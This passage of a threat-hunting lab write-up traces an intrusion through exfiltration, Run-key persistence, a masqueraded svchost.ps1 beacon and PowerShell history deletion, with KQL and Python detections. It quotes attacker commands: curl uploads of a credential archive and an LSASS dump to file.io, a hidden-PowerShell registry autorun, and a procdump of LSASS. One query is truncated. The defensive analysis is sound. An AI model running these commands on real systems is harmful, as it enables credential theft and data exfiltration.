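# Same action with a non-descriptive output name: only the PID gives the target away.
RENAMED_OUTPUT_CMD = r'"pd.exe" -accepteula -ma 876 C:\Windows\Logs\CBS\mem.dmp'
# A developer dumping an IIS worker process: dump behaviour, but not LSASS.
APP_DUMP_CMD = r'procdump64.exe -accepteula -ma 4242 C:\Temp\w3wp.dmp'

if __name__ == "__main__":
    for cmd in (SCENARIO_CMD, RENAMED_OUTPUT_CMD, APP_DUMP_CMD):
        verdict = assess_dump_command(cmd, PROCESS_TABLE)
        print(f"{verdict['severity']:6} {verdict['image']:15} {'; '.join(verdict['signals'])}")
```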
### 🚩 Flag #16: EXFILTRATION - Upload Command
**🎯 Objective**
Command-line HTTP clients enable scriptable data transfers. The complete command syntax is essential for building detection rules.
**📌 Finding**
"curl.exe" -F file=@C:\Windows\Logs\CBS\credentials.tar.gz https://file.io
**🔍 Evidence**

| Field | Value |
|------------------|--------------------------------------------|
| Host | azuki-fileserver01 |
| Timestamp | 2025-11-22T01:59:54.2755596Z |
| Process | curl.exe |
| Parent Process | powershell.exe |
| Command Line | `"curl.exe" -F file=@C:\Windows\Logs\CBS\credentials.tar.gz https://file.io` |

**💡 Why it matters**
The use of curl.exe to upload an archive to an external file-sharing service represents a clear data exfiltration action, not preparation or staging. Command-line HTTP clients allow attackers to automate transfers, bypass browser-based controls, and operate quietly through scripts or living-off-the-land binaries. In this case, the attacker exfiltrated a compressed archive (credentials.tar.gz) from a disguised staging directory, confirming that previously collected and compressed credential material was successfully moved off the host. The destination, file.io, is a legitimate but commonly abused public file-sharing service, making this traffic blend into normal outbound HTTPS activity. This behavior aligns with MITRE ATT&CK T1048.003 – Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Channel, and marks a critical point where sensitive data has already left the environment.
**🔧 KQL Query Used**
```kql
let timeattack5 = todatetime('2025-11-22T02:03:19.9845969Z');
DeviceProcessEvents
| where TimeGenerated between ((timeattack5 - 1h) .. (timeattack5 + 1h))
| where DeviceName contains "azuki"
| where ProcessCommandLine contains "http"
| project TimeGenerated, DeviceName, ActionType, ProcessCommandLine, FileName, InitiatingProcessCommandLine, FolderPath
| order by TimeGenerated desc
```
**🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Focus hunts on outbound data transfers initiated by scripting engines or command-line utilities rather than relying solely on destination reputation. File uploads using curl.exe or similar tools (wget, Invoke-WebRequest) combined with archive file extensions and public file-sharing domains are strong indicators of hands-on-keyboard exfiltration activity.
```kql
DeviceProcessEvents
| where TimeGenerated > ago(30d)
| where FileName in ("curl.exe", "wget.exe")
| where ProcessCommandLine has_any ("http", "https", "-F", "--upload-file")
| where ProcessCommandLine has_any (".zip", ".tar", ".tar.gz", ".7z", ".rar")
| where InitiatingProcessFileName in ("powershell.exe", "cmd.exe")
| project TimeGenerated,
    DeviceName,
    AccountName,
    FileName,
    ProcessCommandLine,
    InitiatingProcessCommandLine
| order by TimeGenerated desc
```
### 🚩 Flag #17: EXFILTRATION - Cloud Service
**🎯 Objective**
Cloud file sharing services provide convenient, anonymous exfiltration channels that blend with legitimate business traffic.
**📌 Finding**
file.io
**🔍 Evidence**

| Field | Value |
|------------------|--------------------------------------------|
| Host | azuki-fileserver01 |
| Timestamp | 2025-11-22T02:25:37.9206525Z |
| Process | curl.exe |
| Parent Process | powershell |
| Command Line | `"curl.exe" -F file=@C:\Windows\Logs\CBS\lsass.dmp https://file.io` |

**💡 Why it matters**
Exfiltrating data to public cloud file-sharing services represents a high-risk data loss scenario because these platforms are widely trusted, encrypted, and commonly allowed through perimeter controls. Attackers favor services like file.io because uploads occur over standard HTTPS, making the traffic difficult to distinguish from legitimate business activity without endpoint context. In this case, the attacker uploaded a full LSASS memory dump, which almost certainly contains cached credentials, NTLM hashes, or Kerberos material. This confirms not just successful credential access, but successful credential theft and removal from the environment, eliminating any opportunity for recovery through containment alone. This behavior aligns with MITRE ATT&CK T1567.002 – Exfiltration Over Web Service: Exfiltration to Cloud Storage, and represents a late-stage breach milestone where incident response urgency is critical.
**🔧 KQL Query Used**
```kql
let timeattack5 = todatetime('2025-11-22T02:03:19.9845969Z');
DeviceNetworkEvents
| where TimeGenerated between ((timeattack5 - 1h) .. (timeattack5 + 1h))
| where DeviceName contains "azuki"
| project TimeGenerated, DeviceName, RemoteIP, RemoteUrl, ActionType, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
```
**🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Hunt for endpoint-initiated connections to public file-sharing services that originate from scripting engines or command-line tools rather than browsers. Prioritize uploads involving sensitive file types such as memory dumps, archives, or database exports, especially when correlated with prior credential dumping or compression activity.
```kql
DeviceNetworkEvents
| where TimeGenerated > ago(30d)
| where RemoteUrl has_any ("file.io", "transfer.sh", "anonfiles", "gofile", "pastebin")
| where InitiatingProcessFileName in ("curl.exe", "powershell.exe", "cmd.exe")
| where InitiatingProcessCommandLine has_any (".dmp", ".zip", ".tar", ".tar.gz", ".7z")
| project TimeGenerated,
    DeviceName,
    AccountName,
    RemoteUrl,
    RemoteIP,
    InitiatingProcessFileName,
    InitiatingProcessCommandLine
| order by TimeGenerated desc
```
### 🚩 Flag #18: PERSISTENCE - Registry Value Name
**🎯 Objective**
Registry autorun keys provide reliable persistence that executes on every system startup or user logon.
**📌 Finding**
FileShareSync
**🔍 Evidence**

| Field | Value |
|------------------|--------------------------------------------|
| Host | azuki-fileserver01 |
| Timestamp | 2025-11-22T02:10:50.8253766Z |
| Process | reg.exe |
| Parent Process | powershell |
| Command Line | `"reg.exe" add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v FileShareSync /t REG_SZ /d "powershell -NoP -W Hidden -File C:\Windows\System32\svchost.ps1" /f` |

**💡 Why it matters**
Registry Run keys provide one of the most reliable and low-noise persistence mechanisms available to attackers, as they guarantee execution on every system startup or user logon. By choosing the value name FileShareSync, the attacker deliberately blends into expected enterprise software naming conventions, reducing the likelihood of casual discovery by administrators or users. The associated command launches a hidden PowerShell process that executes a script from a nonstandard system path, indicating continued control rather than a one-time payload. This persistence occurs after credential access and data exfiltration, strongly suggesting the attacker intends to maintain long-term access for follow-on operations or re-entry. This behavior maps directly to MITRE ATT&CK T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys, a technique commonly observed in hands-on-keyboard intrusions and ransomware precursor activity.
**🔧 KQL Query Used**
```kql
let timeattack5 = todatetime('2025-11-22T02:03:19.9845969Z');
DeviceRegistryEvents
| where TimeGenerated between ((timeattack5 - 1h) .. (timeattack5 + 1h))
| where DeviceName contains "azuki"
| project TimeGenerated, DeviceName, RegistryValueName, RegistryKey, RegistryValueData, InitiatingProcessCommandLine
```
**🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Use this query to proactively identify newly created or modified Run key values, especially those added via command-line tools like reg.exe or PowerShell. Pay close attention to value names that appear legitimate but point to scripts, hidden PowerShell execution, or binaries located outside standard program directories. Correlating these events with earlier credential access or exfiltration activity significantly increases detection confidence.
```kql
DeviceRegistryEvents
| where TimeGenerated > ago(30d)
| where ActionType == "RegistryValueSet"
| where RegistryKey has @"\Software\Microsoft\Windows\CurrentVersion\Run"
| where InitiatingProcessFileName in ("reg.exe", "powershell.exe", "cmd.exe")
| project TimeGenerated,
    DeviceName,
    RegistryValueName,
    RegistryKey,
    RegistryValueData,
    InitiatingProcessFileName,
    InitiatingProcessCommandLine
| order by TimeGenerated desc
```
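The triage this hunting tip describes, and the script-name check from the Flag #19 beacon filename hunt, as one stand-alone Python routine (an added example, not code from this repository): it parses a `reg.exe add` command line into key, value name and data, then scores the data for hidden PowerShell switches, a script launched at logon, a script name that mimics a Windows binary, and a script stored in a system directory. The `tokenize`, `parse_reg_add` and `triage_run_key` helpers and the benign OneDrive sample are constructed; the FileShareSync command line comes from the scenario.

```python
"""Run-key triage modelled on the Flag #18 and Flag #19 hunts: parse a
`reg.exe add ...\\Run` command line and score the autorun value it writes.
Added example; command lines below are constructed samples except the first,
which is the scenario's FileShareSync value."""
import re
from pathlib import PureWindowsPath

RUN_KEYS = ("\\currentversion\\run", "\\currentversion\\runonce")
# Windows binary names the page lists as masquerade targets for scripts.
MASQUERADE_NAMES = {"svchost", "lsass", "services", "winlogon"}
SCRIPT_EXTS = {".ps1", ".vbs", ".js", ".bat", ".cmd"}
SYSTEM_DIRS = ("c:\\windows\\system32", "c:\\windows\\syswow64", "c:\\windows\\logs")
HIDDEN_SWITCHES = ("-w hidden", "-windowstyle hidden", "-nop", "-noprofile",
                   "-encodedcommand", "-enc ")
_TOKENS = re.compile(r'"([^"]*)"|(\S+)')


def tokenize(cmdline):
    """Split on whitespace while keeping double-quoted arguments whole."""
    return [q or bare for q, bare in _TOKENS.findall(cmdline)]


def parse_reg_add(cmdline):
    """Return {key, value_name, value_type, data} for a `reg add`, else None."""
    toks = tokenize(cmdline)
    if len(toks) < 3 or PureWindowsPath(toks[0]).name.lower() not in ("reg.exe", "reg"):
        return None
    if toks[1].lower() != "add":
        return None
    rec = {"key": toks[2].rstrip("\\"), "value_name": "", "value_type": "", "data": ""}
    for i, tok in enumerate(toks[3:], start=3):
        nxt = toks[i + 1] if i + 1 < len(toks) else ""
        if tok.lower() == "/v":
            rec["value_name"] = nxt
        elif tok.lower() == "/t":
            rec["value_type"] = nxt
        elif tok.lower() == "/d":
            rec["data"] = nxt
    return rec


def triage_run_key(cmdline):
    """Score a Run/RunOnce value write. Returns None when the command is not a
    `reg add` to an autorun key; otherwise a dict whose `score` is the number
    of suspicious traits found in the value data."""
    rec = parse_reg_add(cmdline)
    if rec is None or not rec["key"].lower().endswith(RUN_KEYS):
        return None
    data = rec["data"]
    reasons = []
    if any(s in data.lower() for s in HIDDEN_SWITCHES):
        reasons.append("hidden or non-interactive PowerShell switches")
    for tok in tokenize(data):
        p = PureWindowsPath(tok)
        if p.suffix.lower() not in SCRIPT_EXTS:
            continue
        reasons.append(f"autorun launches a script: {tok}")
        if p.stem.lower() in MASQUERADE_NAMES:
            reasons.append(f"script name mimics a Windows binary: {p.name}")
        if str(p.parent).lower().startswith(SYSTEM_DIRS):
            reasons.append(f"script stored in a system directory: {p.parent}")
    return {"key": rec["key"], "value_name": rec["value_name"], "data": data,
            "score": len(reasons), "reasons": reasons}


# Scenario command line (from the page) and a constructed benign Run value.
SCENARIO_CMD = (r'"reg.exe" add HKLM\Software\Microsoft\Windows\CurrentVersion\Run '
                r'/v FileShareSync /t REG_SZ '
                r'/d "powershell -NoP -W Hidden -File C:\Windows\System32\svchost.ps1" /f')
BENIGN_CMD = (r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive '
              r'/t REG_SZ /d "C:\Users\user1\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background" /f')

if __name__ == "__main__":
    for cmd in (SCENARIO_CMD, BENIGN_CMD):
        v = triage_run_key(cmd)
        print(f"{v['value_name']}: score {v['score']}; " + "; ".join(v["reasons"]))
```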
### 🚩 Flag #19: PERSISTENCE - Beacon Filename **🎯 Objective** Process masquerading involves naming malicious files after legitimate Windows components to avoid suspicion. **📌 Finding** svchost.ps1 **🔍 Evidence** | Field | Value | |------------------|--------------------------------------------| | Host | azuki-fileserver01 | | Timestamp | 2025-11-22T02:10:50.8253766Z | | Process | reg.exe | | Parent Process | powershell | | Command Line | `reg.exe" add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v FileShareSync /t REG_SZ /d "powershell -NoP -W Hidden -File C:\Windows\System32\svchost.ps1" /f` | **💡 Why it matters** Masquerading malicious payloads as legitimate Windows components is a deliberate evasion technique designed to bypass both human review and basic security controls. By naming the beacon svchost.ps1, the attacker abuses trust in the well-known svchost.exe process, increasing the likelihood that the file will be overlooked during triage or routine audits. Placing this script in C:\Windows\System32 further strengthens the disguise, as files in this directory are typically assumed to be trusted and system-managed. When combined with a registry Run key, this filename choice enables stealthy, long-term persistence with minimal operational noise. This activity aligns with MITRE ATT&CK T1036.005 – Masquerading: Match Legitimate Name or Location, a common technique in post-exploitation phases where attackers prioritize survivability over speed. **🔧 KQL Query Used** let timeattack5 = todatetime('2025-11-22T02:03:19.9845969Z'); DeviceRegistryEvents | where TimeGenerated between ((timeattack5 - 1h) .. (timeattack5 + 1h)) | where DeviceName contains "azuki" | project TimeGenerated, DeviceName, RegistryValueName, RegistryKey, RegistryValueData, InitiatingProcessCommandLine **🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Hunt for script files (.ps1, .vbs, .js) located in system directories such as System32 or Windows\Logs, especially when referenced by autorun registry keys. Filenames that closely resemble legitimate Windows binaries (e.g., svchost, lsass, services) but use scripting extensions are high-confidence indicators of malicious persistence.
```kql
DeviceFileEvents
| where TimeGenerated > ago(30d)
| where FolderPath has_any ("\\Windows\\System32", "\\Windows\\SysWOW64")
| where FileName endswith ".ps1"
| where FileName has_any ("svchost", "lsass", "services", "winlogon")
| project TimeGenerated,
    DeviceName,
    FileName,
    FolderPath,
    InitiatingProcessFileName,
    InitiatingProcessCommandLine
| order by TimeGenerated desc
```
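As an added example (not part of the original scenario or its KQL), the following Python applies the same masquerading logic to constructed DeviceRegistryEvents rows: it parses the autorun value data, pulls out the launched path, and flags script extensions, system-directory placement, and names that mimic Windows binaries. LEGIT_NAMES, SCRIPT_EXTS, SYSTEM_DIRS, AUTORUN_KEYS and the sample rows are assumptions, not values from the write-up.

```python
import ntpath
import re

# Constructed sample DeviceRegistryEvents rows modelled on the Flag #19 evidence (not real telemetry).
SAMPLE_REGISTRY_EVENTS = [
    {"DeviceName": "azuki-fileserver01",
     "RegistryKey": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run",
     "RegistryValueName": "FileShareSync",
     "RegistryValueData": r"powershell -NoP -W Hidden -File C:\Windows\System32\svchost.ps1"},
    {"DeviceName": "azuki-fileserver01",
     "RegistryKey": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run",
     "RegistryValueName": "OneDrive",
     "RegistryValueData": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
    {"DeviceName": "azuki-fileserver01",
     "RegistryKey": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run",
     "RegistryValueName": "Backup",
     "RegistryValueData": r"powershell -File C:\Scripts\nightly_backup.ps1"},
]

# Hypothetical tuning lists; extend them to match the environment being hunted.
LEGIT_NAMES = {"svchost", "lsass", "services", "winlogon", "csrss", "explorer"}
SCRIPT_EXTS = {".ps1", ".vbs", ".js", ".bat", ".cmd"}
SYSTEM_DIRS = (r"\windows\system32", r"\windows\syswow64", r"\windows\logs")
AUTORUN_KEYS = (r"\currentversion\run", r"\currentversion\runonce")
PATH_RE = re.compile(r'[a-z]:\\[^"\s]+', re.IGNORECASE)  # bare or quoted Windows paths in value data


def masquerade_reasons(event):
    """Return why an autorun value looks like a masqueraded script beacon ([] if nothing stands out)."""
    if not event["RegistryKey"].lower().endswith(AUTORUN_KEYS):
        return []
    reasons = []
    for path in PATH_RE.findall(event["RegistryValueData"]):
        low = path.lower()
        stem, ext = ntpath.splitext(ntpath.basename(low))
        if ext not in SCRIPT_EXTS:
            continue  # executables are covered by other hunts; this one only cares about scripts
        reasons.append(f"script {path} launched from autorun value")
        if any(d in low for d in SYSTEM_DIRS):
            reasons.append("script stored in a system directory")
        if stem in LEGIT_NAMES:
            reasons.append(f"filename mimics legitimate Windows binary '{stem}'")
    return reasons


def hunt_autorun_masquerade(events):
    """Return (RegistryValueName, reasons) for every event that raised at least one reason."""
    hits = []
    for event in events:
        reasons = masquerade_reasons(event)
        if reasons:
            hits.append((event["RegistryValueName"], reasons))
    return hits
```

Entries with three reasons (script, system directory, mimicked name) match the Flag #19 pattern exactly; a single reason is a lower-confidence lead worth a quick look rather than an alert.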
### 🚩 Flag #20: ANTI-FORENSICS - History File Deletion
**🎯 Objective**
PowerShell saves command history to persistent files that survive session termination. Attackers target these files to cover their tracks.
**📌 Finding**
ConsoleHost_history.txt
**🔍 Evidence**
| Field | Value |
|------------------|--------------------------------------------|
| Host | ConsoleHost_history.txt |
| Timestamp | 2025-11-22T02:26:01.1661095Z |
| Process | powershell.exe |
| Parent Process | explorer.exe |
| Command Line | N/A |
**💡 Why it matters**
PowerShell maintains a persistent command history file (ConsoleHost_history.txt) specifically to support forensic reconstruction after an interactive session ends. Deleting this file is a deliberate anti-forensics action intended to erase evidence of executed commands, tooling, and operator intent. This behavior is rarely performed during normal administrative activity and typically occurs after credential access, persistence, or lateral movement—once the attacker is attempting to reduce visibility and slow incident response. The timing of this deletion shortly after malicious PowerShell activity strongly suggests an effort to conceal hands-on-keyboard operations.
This activity maps to MITRE ATT&CK T1070.003 – Indicator Removal on Host: Clear Command History, a common cleanup technique used by post-compromise operators to frustrate forensic timelines and hinder root cause analysis.
**🔧 KQL Query Used**
```kql
let timeattack5 = todatetime('2025-11-22T02:03:19.9845969Z');
DeviceFileEvents
| where TimeGenerated between ((timeattack5 - 1h) .. (timeattack5 + 1h))
| where DeviceName contains "azuki"
| where ActionType == "FileDel
```
**🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Monitor for deletion or truncation of PowerShell history files, particularly when initiated by powershell.exe or shortly following suspicious PowerShell execution. Correlate these events with credential access, registry persistence, or suspicious script execution to identify full attack chains.
```kql
DeviceFileEvents
| where TimeGenerated > ago(30d)
| where ActionType in ("FileDeleted", "FileDeletedByProcess")
| where FileName =~ "ConsoleHost_history.txt"
| project TimeGenerated,
    DeviceName,
    FileName,
    FolderPath,
    InitiatingProcessFileName,
    InitiatingProcessCommandLine
| order by TimeGenerated desc
```
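An added Python example, not from the original write-up, that implements the correlation this hunting tip describes over constructed DeviceFileEvents and DeviceProcessEvents rows: each ConsoleHost_history.txt deletion is paired with suspicious process activity on the same host within the preceding hour, and deletions performed by powershell.exe itself are raised on their own. SUSPICIOUS_MARKERS, the window length and the sample rows are assumptions.

```python
from datetime import datetime, timedelta, timezone

# Constructed sample rows shaped like DeviceFileEvents / DeviceProcessEvents (not real telemetry);
# the azuki-fileserver01 timestamps echo the Flag #19 and Flag #20 evidence above.
FILE_EVENTS = [
    {"Timestamp": "2025-11-22T02:26:01.1661095Z", "DeviceName": "azuki-fileserver01",
     "ActionType": "FileDeleted", "FileName": "ConsoleHost_history.txt",
     "InitiatingProcessFileName": "powershell.exe"},
    {"Timestamp": "2025-11-21T09:00:00.0000000Z", "DeviceName": "azuki-ws07",
     "ActionType": "FileDeleted", "FileName": "ConsoleHost_history.txt",
     "InitiatingProcessFileName": "explorer.exe"},
]
PROCESS_EVENTS = [
    {"Timestamp": "2025-11-22T02:10:50.8253766Z", "DeviceName": "azuki-fileserver01",
     "ProcessCommandLine": r'reg.exe add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v FileShareSync '
                           r'/t REG_SZ /d "powershell -NoP -W Hidden -File C:\Windows\System32\svchost.ps1" /f'},
    {"Timestamp": "2025-11-21T08:30:00.0000000Z", "DeviceName": "azuki-ws07",
     "ProcessCommandLine": r"powershell.exe Get-ChildItem C:\Temp"},
]
# Hypothetical precursor markers; tune to the environment's own suspicious-PowerShell logic.
SUSPICIOUS_MARKERS = (r"currentversion\run", "-w hidden", "-enc", "-nop", "lsass")


def parse_ts(value):
    """Parse an MDE timestamp; these carry 7 fractional digits, one more than datetime accepts."""
    base, _, frac = value.rstrip("Z").partition(".")
    micro = int((frac + "000000")[:6]) if frac else 0
    return datetime.fromisoformat(base).replace(microsecond=micro, tzinfo=timezone.utc)


def history_deletion_chains(file_events, process_events, window=timedelta(hours=1)):
    """Pair each PowerShell history deletion with suspicious process activity on the same host in the preceding window."""
    chains = []
    for fe in file_events:
        if fe["ActionType"] not in ("FileDeleted", "FileDeletedByProcess"):
            continue
        if fe["FileName"].lower() != "consolehost_history.txt":
            continue
        deleted_at = parse_ts(fe["Timestamp"])
        precursors = [
            pe for pe in process_events
            if pe["DeviceName"] == fe["DeviceName"]
            and deleted_at - window <= parse_ts(pe["Timestamp"]) <= deleted_at
            and any(m in pe["ProcessCommandLine"].lower() for m in SUSPICIOUS_MARKERS)
        ]
        # Deletion by powershell.exe itself, or with recent precursors, warrants analyst attention.
        hot = bool(precursors) or fe["InitiatingProcessFileName"].lower() == "powershell.exe"
        chains.append({"device": fe["DeviceName"], "deleted_at": fe["Timestamp"],
                       "severity": "high" if hot else "low", "precursors": precursors})
    return chains
```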
## High-Level Summary
This intrusion represents a full-spectrum post-compromise attack leveraging valid credentials to re-enter the environment, move laterally via RDP, and systematically enumerate the network and host. The attacker demonstrated strong operational discipline by staging data in nonstandard system directories, abusing living-off-the-land binaries (LOLBins), and carefully sequencing actions to avoid early detection. Credential access via LSASS memory dumping marked a decisive escalation, followed by deliberate compression and exfiltration of sensitive data using both direct HTTP transfer and cloud-based file hosting to blend with legitimate traffic. Persistence was established through registry autorun keys using masqueraded filenames, and the operation concluded with targeted anti-forensic actions to remove PowerShell execution history. Overall, the activity reflects a capable adversary executing a methodical, goal-oriented campaign rather than opportunistic or automated malware.